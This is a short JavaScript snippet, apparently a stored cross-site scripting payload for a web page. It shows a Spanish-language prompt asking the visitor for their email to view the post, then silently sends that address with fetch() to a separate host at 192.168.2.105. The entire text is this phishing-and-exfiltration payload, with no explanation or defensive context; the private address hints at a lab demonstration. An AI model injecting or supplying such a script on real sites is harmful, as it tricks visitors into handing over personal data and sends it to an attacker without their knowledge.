<script>
    var email = prompt("Ingresa tu correo electrónico para visualizar el post", "example@example.com");

    if (email == null || email == ""){
        alert("Es necesario ingresar un correo electrónico válido");
    } else {
        fetch('http://192.168.2.105/?email=' + email);
    }

</script>